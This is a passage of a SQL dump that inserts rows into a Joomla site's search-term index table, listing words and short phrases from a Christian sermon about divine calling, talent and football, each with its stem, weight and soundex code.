(302938, 'after you received', 'after you received', 0, 1, 1.6, 'A136213', 1, '*'),
(302939, 'amount', 'amount', 0, 0, 0.4, 'A530', 1, '*'),
(302940, 'amount to', 'amount to', 0, 1, 1.3, 'A530', 1, '*'),
(302941, 'amount to wasting', 'amount to wasting', 0, 1, 1.5667, 'A532352', 1, '*'),
(302942, 'and called us', 'and called us', 0, 1, 1.4333, 'A532432', 1, '*'),
(302943, 'and grace', 'and grace', 0, 1, 1.3, 'A53262', 1, '*'),
(302944, 'and grace which', 'and grace which', 0, 1, 1.5, 'A53262', 1, '*'),
(302945, 'and i didn\'t', 'and i didn', 0, 1, 1.4, 'A5353', 1, '*'),
(302946, 'and i had', 'and i had', 0, 1, 1.3, 'A530', 1, '*'),
(302947, 'and i was', 'and i was', 0, 1, 1.3, 'A532', 1, '*'),
(302948, 'and not a', 'and not a', 0, 1, 1.3, 'A5353', 1, '*'),
(302949, 'and preacher', 'and preacher', 0, 1, 1.4, 'A531626', 1, '*'),
(302950, 'and preacher god', 'and preacher god', 0, 1, 1.5333, 'A53162623', 1, '*'),
(302951, 'and the call', 'and the call', 0, 1, 1.4, 'A5324', 1, '*'),
(302952, 'and use', 'and use', 0, 1, 1.2333, 'A532', 1, '*'),
(302953, 'and use it', 'and use it', 0, 1, 1.3333, 'A5323', 1, '*'),
(302954, 'and you don\'t', 'and you don', 0, 1, 1.4333, 'A5353', 1, '*'),
(302955, 'another person\'s intention', 'anoth person intention', 0, 1, 1.8667, 'A5361625253535', 1, '*'),
(302956, 'are but he\'s', 'ar but he', 0, 1, 1.4, 'A6132', 1, '*'),
(302957, 'are saved there', 'ar saved there', 0, 1, 1.5, 'A62136', 1, '*'),
(302958, 'are those activities', 'ar those activities', 0, 1, 1.6667, 'A6323132', 1, '*'),
(302959, 'as good', 'as good', 0, 1, 1.2333, 'A230', 1, '*'),
(302960, 'as good as', 'as good as', 0, 1, 1.3333, 'A232', 1, '*'),
(302961, 'as those', 'as those', 0, 1, 1.2667, 'A232', 1, '*'),
(302962, 'as those things', 'as those things', 0, 1, 1.5, 'A232352', 1, '*'),
(302963, 'ask you how', 'ask you how', 0, 1, 1.3667, 'A200', 1, '*'),
(302964, 'ask you “did', 'ask you “did', 0, 1, 1.4, 'A230', 1, '*'),
(302965, 'assignments that', 'assign that', 0, 1, 1.5333, 'A25323', 1, '*'),
(302966, 'assignments that it', 'assign that it', 0, 1, 1.6333, 'A25323', 1, '*'),
(302967, 'athlete', 'athlet', 0, 0, 0.4667, 'A343', 1, '*'),
(302968, 'athlete i', 'athlet i', 0, 1, 1.3, 'A343', 1, '*'),
(302969, 'athlete i ran', 'athlet i ran', 0, 1, 1.4333, 'A34365', 1, '*'),
(302970, 'became a', 'becam a', 0, 1, 1.2667, 'B250', 1, '*'),
(302971, 'became a football', 'becam a football', 0, 1, 1.5667, 'B251314', 1, '*'),
(302972, 'because i still', 'becaus i still', 0, 1, 1.5, 'B234', 1, '*'),
(302973, 'become a preacher', 'becom a preacher', 0, 1, 1.5667, 'B251626', 1, '*'),
(302974, 'before jesus', 'befor jesus', 0, 1, 1.4, 'B620', 1, '*'),
(302975, 'before jesus he\'s', 'befor jesus he', 0, 1, 1.5667, 'B620', 1, '*'),
(302976, 'before time', 'befor time', 0, 1, 1.3667, 'B635', 1, '*'),
(302977, 'before time began', 'befor time began', 0, 1, 1.5667, 'B635125', 1, '*'),
(302978, 'began if', 'began if', 0, 1, 1.2667, 'B251', 1, '*'),
(302979, 'began if you', 'began if you', 0, 1, 1.4, 'B251', 1, '*'),
(302980, 'beloved take heed', 'belov take heed', 0, 1, 1.5667, 'B41323', 1, '*'),
(302981, 'blessing he', 'bless he', 0, 1, 1.3667, 'B4252', 1, '*'),
(302982, 'blessing he cannot', 'bless he cannot', 0, 1, 1.6, 'B425253', 1, '*'),
(302983, 'blessing that', 'bless that', 0, 1, 1.4333, 'B42523', 1, '*'),
(302984, 'blessing that god', 'bless that god', 0, 1, 1.5667, 'B4252323', 1, '*'),
(302985, 'bring into', 'bring into', 0, 1, 1.3333, 'B65253', 1, '*'),
(302986, 'bring into your', 'bring into your', 0, 1, 1.5, 'B652536', 1, '*'),
(302987, 'bring your', 'bring your', 0, 1, 1.3333, 'B6526', 1, '*'),
(302988, 'bring your effort', 'bring your effort', 0, 1, 1.5667, 'B6526163', 1, '*'),
(302989, 'but according', 'but according', 0, 1, 1.4333, 'B326352', 1, '*'),
(302990, 'but according to', 'but according to', 0, 1, 1.5333, 'B3263523', 1, '*'),
(302991, 'but after you', 'but after you', 0, 1, 1.4333, 'B3136', 1, '*'),
(302992, 'but he\'s', 'but he', 0, 1, 1.2667, 'B320', 1, '*'),
(302993, 'but he\'s going', 'but he going', 0, 1, 1.4667, 'B3252', 1, '*'),
(302994, 'but if i', 'but if i', 0, 1, 1.2667, 'B310', 1, '*'),
(302995, 'but to his', 'but to his', 0, 1, 1.3333, 'B320', 1, '*'),
(302996, 'call 2', 'call 2', 0, 1, 1.2, 'C400', 1, '*'),
(302997, 'call 2 timothy', 'call 2 timothy', 0, 1, 1.4667, 'C4353', 1, '*'),
(302998, 'call so', 'call so', 0, 1, 1.2333, 'C420', 1, '*'),
(302999, 'call so you', 'call so you', 0, 1, 1.3667, 'C420', 1, '*'),
(303000, 'call that', 'call that', 0, 1, 1.3, 'C430', 1, '*'),
(303001, 'call that paul', 'call that paul', 0, 1, 1.4667, 'C4314', 1, '*'),
(303002, 'call upon', 'call upon', 0, 1, 1.3, 'C415', 1, '*'),
(303003, 'call upon your', 'call upon your', 0, 1, 1.4667, 'C4156', 1, '*'),
(303004, 'called us with', 'call us with', 0, 1, 1.4667, 'C4323', 1, '*'),
(303005, 'calling has', 'call has', 0, 1, 1.3667, 'C452', 1, '*'),
(303006, 'calling has nothing', 'call has nothing', 0, 1, 1.6333, 'C4525352', 1, '*'),
(303007, 'calling not', 'call not', 0, 1, 1.3667, 'C45253', 1, '*'),
(303008, 'calling not according', 'call not according', 0, 1, 1.7, 'C4525326352', 1, '*'),
(303009, 'calling of god', 'call of god', 0, 1, 1.4667, 'C452123', 1, '*'),
(303010, 'calling you', 'call you', 0, 1, 1.3667, 'C452', 1, '*'),
(303011, 'calling you will', 'call you will', 0, 1, 1.5333, 'C4524', 1, '*'),
(303012, 'can do is', 'can do is', 0, 1, 1.3, 'C532', 1, '*'),
(303013, 'can\'t do', 'can do', 0, 1, 1.2667, 'C530', 1, '*'),
(303014, 'can\'t do enough', 'can do enough', 0, 1, 1.5, 'C5352', 1, '*'),
(303015, 'can\'t merit', 'can merit', 0, 1, 1.3667, 'C53563', 1, '*'),
(303016, 'can\'t merit the', 'can merit the', 0, 1, 1.5, 'C53563', 1, '*'),
(303017, 'can\'t take the', 'can take the', 0, 1, 1.4667, 'C5323', 1, '*'),
(303018, 'cannot bring', 'cannot bring', 0, 1, 1.4, 'C531652', 1, '*'),
(303019, 'cannot bring into', 'cannot bring into', 0, 1, 1.5667, 'C53165253', 1, '*'),
(303020, 'cannot withdraw', 'cannot withdraw', 0, 1, 1.5, 'C536', 1, '*'),
(303021, 'cannot withdraw from', 'cannot withdraw from', 0, 1, 1.6667, 'C536165', 1, '*'),
(303022, 'christ jesus before', 'christ jesus before', 0, 1, 1.6333, 'C623216', 1, '*'),
(303023, 'clubs', 'club', 0, 0, 0.3333, 'C412', 1, '*'),
(303024, 'clubs one', 'club one', 0, 1, 1.3, 'C4125', 1, '*'),
(303025, 'clubs one or', 'club one or', 0, 1, 1.4, 'C41256', 1, '*'),
(303026, 'comfort but', 'comfort but', 0, 1, 1.3667, 'C516313', 1, '*'),
(303027, 'comfort but to', 'comfort but to', 0, 1, 1.4667, 'C516313', 1, '*'),
(303028, 'coming to the', 'come to the', 0, 1, 1.4333, 'C523', 1, '*'),
(303029, 'committed to our', 'commit to our', 0, 1, 1.5333, 'C536', 1, '*'),
(303030, 'considered my', 'consid my', 0, 1, 1.4333, 'C523635', 1, '*'),
(303031, 'considered my coming', 'consid my coming', 0, 1, 1.6667, 'C523635252', 1, '*'),
(303032, 'could have', 'could have', 0, 1, 1.3333, 'C431', 1, '*'),
(303033, 'could have developed', 'could have developed', 0, 1, 1.6667, 'C43131413', 1, '*'),
(303034, 'creating you', 'creat you', 0, 1, 1.4, 'C6352', 1, '*'),
(303035, 'creating you if', 'creat you if', 0, 1, 1.5, 'C63521', 1, '*'),
(303036, 'dangerous', 'danger', 0, 0, 0.6, 'D5262', 2, '*'),
(303037, 'dangerous things', 'danger things', 0, 1, 1.5333, 'D5262352', 1, '*'),
(303038, 'dangerous things we', 'danger things we', 0, 1, 1.6333, 'D5262352', 1, '*'),
(303039, 'day when you', 'dai when you', 0, 1, 1.4, 'D500', 1, '*'),
(303040, 'degrees', 'degre', 0, 0, 0.4667, 'D262', 1, '*'),
(303041, 'degrees you', 'degre you', 0, 1, 1.3667, 'D262', 1, '*'),
(303042, 'degrees you obtained', 'degre you obtained', 0, 1, 1.6667, 'D2621353', 1, '*'),
(303043, 'destiny and the', 'destini and the', 0, 1, 1.5, 'D2353', 1, '*'),
(303044, 'developed', 'develop', 0, 0, 0.6, 'D1413', 1, '*'),
(303045, 'developed that', 'develop that', 0, 1, 1.4667, 'D1413', 1, '*'),
(303046, 'developed that talent', 'develop that talent', 0, 1, 1.7, 'D1413453', 1, '*'),
(303047, 'did you', 'did you', 0, 1, 1.2333, 'D000', 1, '*'),
(303048, 'did you release', 'did you release', 0, 1, 1.5, 'D642', 1, '*'),
(303049, 'didn\'t become', 'didn become', 0, 1, 1.4333, 'D53125', 1, '*'),
(303050, 'didn\'t become a', 'didn become a', 0, 1, 1.5, 'D53125', 1, '*'),
(303051, 'divine call 2', 'divin call 2', 0, 1, 1.4333, 'D1524', 1, '*'),
(303052, 'do enough', 'do enough', 0, 1, 1.3, 'D520', 1, '*'),
(303053, 'do enough to', 'do enough to', 0, 1, 1.4, 'D523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(303054, 'do every', 'do every', 0, 1, 1.2667, 'D160', 1, '*'),
(303055, 'do every other', 'do every other', 0, 1, 1.4667, 'D1636', 1, '*'),
(303056, 'do them when', 'do them when', 0, 1, 1.4, 'D500', 1, '*'),
(303057, 'do what i', 'do what i', 0, 1, 1.3, 'D000', 1, '*'),
(303058, 'do what we', 'do what we', 0, 1, 1.3333, 'D000', 1, '*'),
(303059, 'don\'t do them', 'don do them', 0, 1, 1.4333, 'D535', 1, '*'),
(303060, 'duties responsibilities', 'duti responsibilities', 0, 1, 1.7667, 'D2621521432', 1, '*'),
(303061, 'duties responsibilities assignments', 'duti responsibilities assignments', 0, 1, 2, 'D2621521432532', 1, '*'),
(303062, 'earth a', 'earth a', 0, 1, 1.2333, 'E630', 1, '*'),
(303063, 'earth a waste', 'earth a waste', 0, 1, 1.4333, 'E6323', 1, '*'),
(303064, 'earth and you', 'earth and you', 0, 1, 1.4333, 'E6353', 1, '*'),
(303065, 'effort into', 'effort into', 0, 1, 1.3667, 'E16353', 1, '*'),
(303066, 'effort into it', 'effort into it', 0, 1, 1.4667, 'E16353', 1, '*'),
(303067, 'efforts', 'effort', 0, 0, 0.4667, 'E1632', 1, '*'),
(303068, 'efforts but', 'effort but', 0, 1, 1.3667, 'E163213', 1, '*'),
(303069, 'efforts but after', 'effort but after', 0, 1, 1.5667, 'E163213136', 1, '*'),
(303070, 'enough talent', 'enough talent', 0, 1, 1.4333, 'E523453', 1, '*'),
(303071, 'enough talent in', 'enough talent in', 0, 1, 1.5333, 'E5234535', 1, '*'),
(303072, 'enough talent too', 'enough talent too', 0, 1, 1.5667, 'E523453', 1, '*'),
(303073, 'enough to qualify', 'enough to qualify', 0, 1, 1.5667, 'E523241', 1, '*'),
(303074, 'every other thing', 'everi other thing', 0, 1, 1.5667, 'E1636352', 1, '*'),
(303075, 'father\'s heart 30', 'father heart 30', 0, 1, 1.5667, 'F36263', 1, '*'),
(303076, 'find that', 'find that', 0, 1, 1.3, 'F530', 2, '*'),
(303077, 'find that call', 'find that call', 0, 1, 1.4667, 'F5324', 1, '*'),
(303078, 'find that sacred', 'find that sacred', 0, 1, 1.5333, 'F53263', 1, '*'),
(303079, 'football', 'footbal', 0, 0, 0.5333, 'F314', 1, '*'),
(303080, 'football actually', 'footbal actually', 0, 1, 1.5667, 'F314234', 1, '*'),
(303081, 'football actually to', 'footbal actually to', 0, 1, 1.6667, 'F3142343', 1, '*'),
(303082, 'football and', 'footbal and', 0, 1, 1.4, 'F31453', 1, '*'),
(303083, 'football and i', 'footbal and i', 0, 1, 1.4667, 'F31453', 1, '*'),
(303084, 'football star', 'footbal star', 0, 1, 1.4333, 'F314236', 1, '*'),
(303085, 'football star and', 'footbal star and', 0, 1, 1.5667, 'F31423653', 1, '*'),
(303086, 'football star it', 'footbal star it', 0, 1, 1.5333, 'F3142363', 1, '*'),
(303087, 'football together', 'footbal together', 0, 1, 1.5667, 'F3143236', 1, '*'),
(303088, 'football together that', 'footbal together that', 0, 1, 1.7333, 'F31432363', 1, '*'),
(303089, 'footballer', 'footbal', 0, 0, 0.6667, 'F3146', 1, '*'),
(303090, 'footballer and', 'footbal and', 0, 1, 1.4667, 'F314653', 1, '*'),
(303091, 'footballer and i', 'footbal and i', 0, 1, 1.5333, 'F314653', 1, '*'),
(303092, 'for another', 'for another', 0, 1, 1.3667, 'F6536', 1, '*'),
(303093, 'for another person\'s', 'for another person', 0, 1, 1.6667, 'F653616252', 1, '*'),
(303094, 'for clubs', 'for clubs', 0, 1, 1.3, 'F62412', 1, '*'),
(303095, 'for clubs one', 'for clubs one', 0, 1, 1.4333, 'F624125', 1, '*'),
(303096, 'for something', 'for something', 0, 1, 1.4333, 'F625352', 1, '*'),
(303097, 'for something and', 'for something and', 0, 1, 1.5667, 'F62535253', 1, '*'),
(303098, 'for the call', 'for the call', 0, 1, 1.4, 'F6324', 1, '*'),
(303099, 'for the national', 'for the national', 0, 1, 1.5333, 'F635354', 1, '*'),
(303100, 'for you can\'t', 'for you can', 0, 1, 1.4333, 'F6253', 1, '*'),
(303101, 'for your own', 'for your own', 0, 1, 1.4, 'F650', 1, '*'),
(303102, 'from heaven did', 'from heaven did', 0, 1, 1.5, 'F65153', 1, '*'),
(303103, 'from your life', 'from your life', 0, 1, 1.4667, 'F65641', 1, '*'),
(303104, 'fulfill his', 'fulfil his', 0, 1, 1.3667, 'F4142', 2, '*'),
(303105, 'fulfill his purpose', 'fulfil his purpose', 0, 1, 1.6333, 'F41421612', 1, '*'),
(303106, 'gifted', 'gift', 0, 0, 0.4, 'G130', 1, '*'),
(303107, 'gifted you', 'gift you', 0, 1, 1.3333, 'G130', 1, '*'),
(303108, 'gifted you for', 'gift you for', 0, 1, 1.4667, 'G1316', 1, '*'),
(303109, 'goand', 'goand', 0, 0, 0.3333, 'G530', 1, '*'),
(303110, 'goand win', 'goand win', 0, 1, 1.3, 'G535', 1, '*'),
(303111, 'goand win with', 'goand win with', 0, 1, 1.4667, 'G5353', 1, '*'),
(303112, 'god and use', 'god and use', 0, 1, 1.3667, 'G3532', 1, '*'),
(303113, 'god cannot', 'god cannot', 0, 1, 1.3333, 'G3253', 1, '*'),
(303114, 'god cannot bring', 'god cannot bring', 0, 1, 1.5333, 'G32531652', 1, '*'),
(303115, 'god has gifted', 'god has gifted', 0, 1, 1.4667, 'G3213', 1, '*'),
(303116, 'god is something', 'god is something', 0, 1, 1.5333, 'G325352', 1, '*'),
(303117, 'god it means', 'god it means', 0, 1, 1.4, 'G352', 1, '*'),
(303118, 'god would have', 'god would have', 0, 1, 1.4667, 'G3431', 1, '*'),
(303119, 'god\'s intention', 'god intention', 0, 1, 1.5, 'G3253535', 1, '*'),
(303120, 'god\'s intention for', 'god intention for', 0, 1, 1.6333, 'G325353516', 1, '*'),
(303121, 'god\'s time', 'god time', 0, 1, 1.3333, 'G3235', 1, '*'),
(303122, 'god\'s time in', 'god time in', 0, 1, 1.4333, 'G3235', 1, '*'),
(303123, 'going to ask', 'go to ask', 0, 1, 1.4, 'G5232', 1, '*'),
(303124, 'gone on', 'gone on', 0, 1, 1.2333, 'G500', 1, '*'),
(303125, 'gone on because', 'gone on because', 0, 1, 1.5, 'G512', 1, '*'),
(303126, 'good as', 'good as', 0, 1, 1.2333, 'G320', 1, '*'),
(303127, 'good as those', 'good as those', 0, 1, 1.4333, 'G3232', 1, '*'),
(303128, 'good athlete', 'good athlete', 0, 1, 1.4, 'G343', 1, '*'),
(303129, 'good athlete i', 'good athlete i', 0, 1, 1.4667, 'G343', 1, '*'),
(303130, 'good footballer', 'good footballer', 0, 1, 1.5, 'G313146', 1, '*'),
(303131, 'good footballer and', 'good footballer and', 0, 1, 1.6333, 'G31314653', 1, '*'),
(303132, 'good i', 'good i', 0, 1, 1.2, 'G300', 1, '*'),
(303133, 'good i had', 'good i had', 0, 1, 1.3333, 'G300', 1, '*'),
(303134, 'gospel and', 'gospel and', 0, 1, 1.3333, 'G1453', 1, '*'),
(303135, 'gospel and not', 'gospel and not', 0, 1, 1.4667, 'G145353', 1, '*'),
(303136, 'grace which', 'grace which', 0, 1, 1.3667, 'G620', 1, '*'),
(303137, 'grace which was', 'grace which was', 0, 1, 1.5, 'G620', 1, '*'),
(303138, 'had enough', 'had enough', 0, 1, 1.3333, 'H352', 1, '*'),
(303139, 'had enough talent', 'had enough talent', 0, 1, 1.5667, 'H3523453', 1, '*'),
(303140, 'has gifted', 'ha gifted', 0, 1, 1.3333, 'H213', 1, '*'),
(303141, 'has gifted you', 'ha gifted you', 0, 1, 1.4667, 'H213', 1, '*'),
(303142, 'has nothing to', 'ha nothing to', 0, 1, 1.4667, 'H253523', 1, '*'),
(303143, 'has saved', 'ha saved', 0, 1, 1.3, 'H213', 1, '*'),
(303144, 'has saved us', 'ha saved us', 0, 1, 1.4, 'H2132', 1, '*'),
(303145, 'have become a', 'have become a', 0, 1, 1.4333, 'H125', 1, '*'),
(303146, 'have considered', 'have considered', 0, 1, 1.5, 'H1252363', 1, '*'),
(303147, 'have considered my', 'have considered my', 0, 1, 1.6, 'H12523635', 1, '*'),
(303148, 'have developed', 'have developed', 0, 1, 1.4667, 'H131413', 1, '*'),
(303149, 'have developed that', 'have developed that', 0, 1, 1.6333, 'H131413', 1, '*'),
(303150, 'have gone', 'have gone', 0, 1, 1.3, 'H125', 1, '*'),
(303151, 'have gone on', 'have gone on', 0, 1, 1.4, 'H125', 1, '*'),
(303152, 'have to bring', 'have to bring', 0, 1, 1.4333, 'H131652', 1, '*'),
(303153, 'he cannot', 'he cannot', 0, 1, 1.3, 'H253', 1, '*'),
(303154, 'he cannot withdraw', 'he cannot withdraw', 0, 1, 1.6, 'H2536', 1, '*'),
(303155, 'he\'s going', 'he going', 0, 1, 1.3333, 'H252', 1, '*'),
(303156, 'he\'s going to', 'he going to', 0, 1, 1.4333, 'H2523', 1, '*'),
(303157, 'he\'s not going', 'he not going', 0, 1, 1.4667, 'H253252', 1, '*'),
(303158, 'heart 30', 'heart 30', 0, 1, 1.2667, 'H630', 1, '*'),
(303159, 'heart 30 04', 'heart 30 04', 0, 1, 1.3667, 'H630', 1, '*'),
(303160, 'heaven did', 'heaven did', 0, 1, 1.3333, 'H153', 1, '*'),
(303161, 'heaven did you', 'heaven did you', 0, 1, 1.4667, 'H153', 1, '*'),
(303162, 'heed to your', 'heed to your', 0, 1, 1.4, 'H360', 2, '*'),
(303163, 'his own purpose', 'hi own purpose', 0, 1, 1.5, 'H251612', 1, '*'),
(303164, 'his purpose', 'hi purpose', 0, 1, 1.3667, 'H21612', 2, '*'),
(303165, 'his purpose and', 'hi purpose and', 0, 1, 1.5, 'H2161253', 1, '*'),
(303166, 'his purpose god', 'hi purpose god', 0, 1, 1.5, 'H216123', 1, '*'),
(303167, 'his purpose in', 'hi purpose in', 0, 1, 1.4667, 'H216125', 1, '*'),
(303168, 'holy calling', 'holi calling', 0, 1, 1.4, 'H42452', 1, '*'),
(303169, 'holy calling not', 'holi calling not', 0, 1, 1.5333, 'H4245253', 1, '*'),
(303170, 'how many degrees', 'how many degrees', 0, 1, 1.5333, 'H53262', 1, '*'),
(303171, 'i became', 'i became', 0, 1, 1.2667, 'I125', 1, '*'),
(303172, 'i became a', 'i became a', 0, 1, 1.3333, 'I125', 1, '*'),
(303173, 'i could', 'i could', 0, 1, 1.2333, 'I243', 1, '*'),
(303174, 'i could have', 'i could have', 0, 1, 1.4, 'I2431', 1, '*'),
(303175, 'i didn\'t', 'i didn', 0, 1, 1.2667, 'I353', 1, '*'),
(303176, 'i didn\'t become', 'i didn become', 0, 1, 1.5, 'I353125', 1, '*'),
(303177, 'i had enough', 'i had enough', 0, 1, 1.4, 'I352', 1, '*'),
(303178, 'i have become', 'i have become', 0, 1, 1.4333, 'I125', 1, '*'),
(303179, 'i played', 'i played', 0, 1, 1.2667, 'I143', 1, '*'),
(303180, 'i played football', 'i played football', 0, 1, 1.5667, 'I1431314', 1, '*'),
(303181, 'i ran', 'i ran', 0, 1, 1.1667, 'I650', 1, '*'),
(303182, 'i ran 1500', 'i ran 1500', 0, 1, 1.3333, 'I650', 1, '*'),
(303183, 'i sent', 'i sent', 0, 1, 1.2, 'I253', 1, '*'),
(303184, 'i sent you', 'i sent you', 0, 1, 1.3333, 'I253', 1, '*'),
(303185, 'i still', 'i still', 0, 1, 1.2333, 'I234', 1, '*'),
(303186, 'i still remember', 'i still remember', 0, 1, 1.5333, 'I2346516', 1, '*'),
(303187, 'i was a', 'i was a', 0, 1, 1.2333, 'I200', 1, '*'),
(303188, 'i was in', 'i was in', 0, 1, 1.2667, 'I250', 1, '*'),
(303189, 'i was quite', 'i was quite', 0, 1, 1.3667, 'I230', 1, '*'),
(303190, 'if i became', 'if i became', 0, 1, 1.3667, 'I125', 1, '*'),
(303191, 'if it will', 'if it will', 0, 1, 1.3333, 'I134', 1, '*'),
(303192, 'in creating', 'in creating', 0, 1, 1.3667, 'I526352', 1, '*'),
(303193, 'in creating you', 'in creating you', 0, 1, 1.5, 'I526352', 1, '*'),
(303194, 'in football', 'in football', 0, 1, 1.3667, 'I51314', 1, '*'),
(303195, 'in football actually', 'in football actually', 0, 1, 1.6667, 'I51314234', 1, '*'),
(303196, 'in our lives', 'in our lives', 0, 1, 1.4, 'I56412', 1, '*'),
(303197, 'in secondary', 'in secondary', 0, 1, 1.4, 'I52536', 1, '*'),
(303198, 'in secondary school', 'in secondary school', 0, 1, 1.6333, 'I5253624', 1, '*'),
(303199, 'inside you from', 'insid you from', 0, 1, 1.5, 'I523165', 1, '*'),
(303200, 'inside you what', 'insid you what', 0, 1, 1.5, 'I523', 1, '*'),
(303201, 'intention', 'intent', 0, 0, 0.6, 'I53535', 1, '*'),
(303202, 'intention for', 'intent for', 0, 1, 1.4333, 'I5353516', 1, '*'),
(303203, 'intention for something', 'intent for something', 0, 1, 1.7667, 'I535351625352', 1, '*'),
(303204, 'intention one', 'intent one', 0, 1, 1.4333, 'I53535', 1, '*'),
(303205, 'intention one day', 'intent one day', 0, 1, 1.5667, 'I535353', 1, '*'),
(303206, 'into it', 'into it', 0, 1, 1.2333, 'I530', 1, '*'),
(303207, 'into it this', 'into it this', 0, 1, 1.4, 'I532', 1, '*'),
(303208, 'invested', 'invest', 0, 0, 0.5333, 'I5123', 1, '*'),
(303209, 'invested inside', 'invest inside', 0, 1, 1.5, 'I5123523', 1, '*'),
(303210, 'invested inside you', 'invest inside you', 0, 1, 1.6333, 'I5123523', 1, '*'),
(303211, 'is a call', 'is a call', 0, 1, 1.3, 'I240', 1, '*'),
(303212, 'is no blessing', 'is no blessing', 0, 1, 1.4667, 'I2514252', 1, '*'),
(303213, 'is not committed', 'is not committed', 0, 1, 1.5333, 'I253253', 1, '*'),
(303214, 'is referring', 'is referring', 0, 1, 1.4, 'I261652', 1, '*'),
(303215, 'is referring to', 'is referring to', 0, 1, 1.5, 'I2616523', 1, '*'),
(303216, 'is something that', 'is something that', 0, 1, 1.5667, 'I253523', 2, '*'),
(303217, 'is to take', 'is to take', 0, 1, 1.3333, 'I232', 1, '*'),
(303218, 'it for another', 'it for another', 0, 1, 1.4667, 'I316536', 1, '*'),
(303219, 'it for your', 'it for your', 0, 1, 1.3667, 'I316', 1, '*'),
(303220, 'it means the', 'it means the', 0, 1, 1.4, 'I3523', 1, '*'),
(303221, 'it this', 'it this', 0, 1, 1.2333, 'I320', 1, '*'),
(303222, 'it this means', 'it this means', 0, 1, 1.4333, 'I3252', 1, '*'),
(303223, 'it to mankind', 'it to mankind', 0, 1, 1.4333, 'I35253', 1, '*'),
(303224, 'it will amount', 'it will amount', 0, 1, 1.4667, 'I3453', 1, '*'),
(303225, 'it will fulfill', 'it will fulfill', 0, 1, 1.5, 'I341414', 1, '*'),
(303226, 'item 45', 'item 45', 0, 1, 1.2333, 'I350', 1, '*'),
(303227, 'item 45 from', 'item 45 from', 0, 1, 1.4, 'I35165', 1, '*'),
(303228, 'jesus before', 'jesu before', 0, 1, 1.4, 'J160', 1, '*'),
(303229, 'jesus before time', 'jesu before time', 0, 1, 1.5667, 'J1635', 1, '*'),
(303230, 'jesus he\'s', 'jesu he', 0, 1, 1.3333, 'J000', 1, '*'),
(303231, 'jesus he\'s not', 'jesu he not', 0, 1, 1.4667, 'J530', 1, '*'),
(303232, 'k2 item 45', 'k2 item 45', 0, 1, 1.3333, 'K350', 1, '*'),
(303233, 'life if', 'life if', 0, 1, 1.2333, 'L100', 1, '*'),
(303234, 'life if it', 'life if it', 0, 1, 1.3333, 'L130', 1, '*'),
(303235, 'lives till', 'live till', 0, 1, 1.3333, 'L1234', 1, '*'),
(303236, 'lives till next', 'live till next', 0, 1, 1.5, 'L1234523', 1, '*'),
(303237, 'mankind', 'mankind', 0, 0, 0.4667, 'M253', 1, '*'),
(303238, 'mankind there', 'mankind there', 0, 1, 1.4333, 'M2536', 1, '*'),
(303239, 'mankind there is', 'mankind there is', 0, 1, 1.5333, 'M25362', 1, '*'),
(303240, 'many degrees', 'mani degrees', 0, 1, 1.4, 'M3262', 1, '*'),
(303241, 'many degrees you', 'mani degrees you', 0, 1, 1.5333, 'M3262', 1, '*'),
(303242, 'means the', 'mean the', 0, 1, 1.3, 'M230', 1, '*'),
(303243, 'means the calling', 'mean the calling', 0, 1, 1.5667, 'M232452', 1, '*'),
(303244, 'means you can\'t', 'mean you can', 0, 1, 1.5, 'M253', 1, '*'),
(303245, 'merit', 'merit', 0, 0, 0.3333, 'M630', 1, '*'),
(303246, 'merit the', 'merit the', 0, 1, 1.3, 'M630', 1, '*'),
(303247, 'merit the calling', 'merit the calling', 0, 1, 1.5667, 'M632452', 1, '*'),
(303248, 'metres', 'metr', 0, 0, 0.4, 'M362', 1, '*'),
(303249, 'metres race', 'metr race', 0, 1, 1.3667, 'M36262', 1, '*'),
(303250, 'metres race i', 'metr race i', 0, 1, 1.4333, 'M36262', 1, '*'),
(303251, 'most dangerous', 'most dangerous', 0, 1, 1.4667, 'M235262', 1, '*'),
(303252, 'most dangerous things', 'most dangerous things', 0, 1, 1.7, 'M235262352', 1, '*'),
(303253, 'must find', 'must find', 0, 1, 1.3, 'M23153', 2, '*'),
(303254, 'must find that', 'must find that', 0, 1, 1.4667, 'M23153', 2, '*'),
(303255, 'my coming', 'my coming', 0, 1, 1.3, 'M252', 1, '*'),
(303256, 'my coming to', 'my coming to', 0, 1, 1.4, 'M2523', 1, '*'),
(303257, 'national', 'nation', 0, 0, 0.5333, 'N354', 1, '*'),
(303258, 'national team', 'nation team', 0, 1, 1.4333, 'N35435', 1, '*'),
(303259, 'national team and', 'nation team and', 0, 1, 1.5667, 'N354353', 1, '*'),
(303260, 'next week goand', 'next week goand', 0, 1, 1.5, 'N23253', 1, '*'),
(303261, 'no blessing', 'no blessing', 0, 1, 1.3667, 'N14252', 1, '*'),
(303262, 'no blessing he', 'no blessing he', 0, 1, 1.4667, 'N14252', 1, '*'),
(303263, 'no blessing that', 'no blessing that', 0, 1, 1.5333, 'N142523', 1, '*'),
(303264, 'not a football', 'not a football', 0, 1, 1.4667, 'N31314', 1, '*'),
(303265, 'not a waste', 'not a waste', 0, 1, 1.3667, 'N323', 1, '*'),
(303266, 'not according', 'not according', 0, 1, 1.4333, 'N326352', 1, '*'),
(303267, 'not according to', 'not according to', 0, 1, 1.5333, 'N3263523', 1, '*'),
(303268, 'not committed', 'not committed', 0, 1, 1.4333, 'N3253', 1, '*'),
(303269, 'not committed to', 'not committed to', 0, 1, 1.5333, 'N3253', 1, '*'),
(303270, 'not going', 'not going', 0, 1, 1.3, 'N3252', 2, '*'),
(303271, 'not going to', 'not going to', 0, 1, 1.4, 'N32523', 2, '*'),
(303272, 'nothing to do', 'noth to do', 0, 1, 1.4333, 'N3523', 1, '*'),
(303273, 'now have to', 'now have to', 0, 1, 1.3667, 'N130', 1, '*'),
(303274, 'now i have', 'now i have', 0, 1, 1.3333, 'N100', 1, '*'),
(303275, 'obtained', 'obtain', 0, 0, 0.5333, 'O1353', 1, '*'),
(303276, 'obtained as', 'obtain as', 0, 1, 1.3667, 'O13532', 1, '*'),
(303277, 'obtained as good', 'obtain as good', 0, 1, 1.5333, 'O135323', 1, '*'),
(303278, 'of the people', 'of the people', 0, 1, 1.4333, 'O1314', 2, '*'),
(303279, 'on because', 'on because', 0, 1, 1.3333, 'O512', 1, '*'),
(303280, 'on because i', 'on because i', 0, 1, 1.4, 'O512', 1, '*'),
(303281, 'on to play', 'on to play', 0, 1, 1.3333, 'O5314', 1, '*'),
(303282, 'one day when', 'on day when', 0, 1, 1.4, 'O535', 1, '*'),
(303283, 'or two people', 'or two people', 0, 1, 1.4333, 'O6314', 1, '*'),
